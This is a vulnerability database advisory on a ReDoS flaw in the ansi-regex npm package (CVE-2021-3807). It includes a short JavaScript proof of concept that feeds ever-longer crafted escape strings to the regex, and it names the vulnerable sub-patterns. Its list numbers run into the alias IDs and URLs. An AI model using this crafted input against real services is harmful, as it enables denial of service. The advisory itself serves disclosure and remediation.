logo

Database

Asymmetric denial of service - ReDoS In ansi-regex

Description

Inefficient Regular Expression Complexity in chalk/ansi-regex ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept

import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}...

The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2021-38072. NVD-2021-38073. OSV-2021-38074. OSV-DEBIAN-2021-38075. GCVE-2021-38076. SECURITY-TRACKER-CVE-2021-3807

References

1. https://github.com/chalk/ansi-regex/issues/38#issuecomment-9240863112. https://github.com/chalk/ansi-regex/issues/38#issuecomment-9259247743. https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f14. https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a5. https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f96. https://github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde87. https://github.com/chalk/ansi-regex/releases/tag/v6.0.18. https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd9949. https://security.netapp.com/advisory/ntap-20221014-000210. https://www.oracle.com/security-alerts/cpuapr2022.html

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.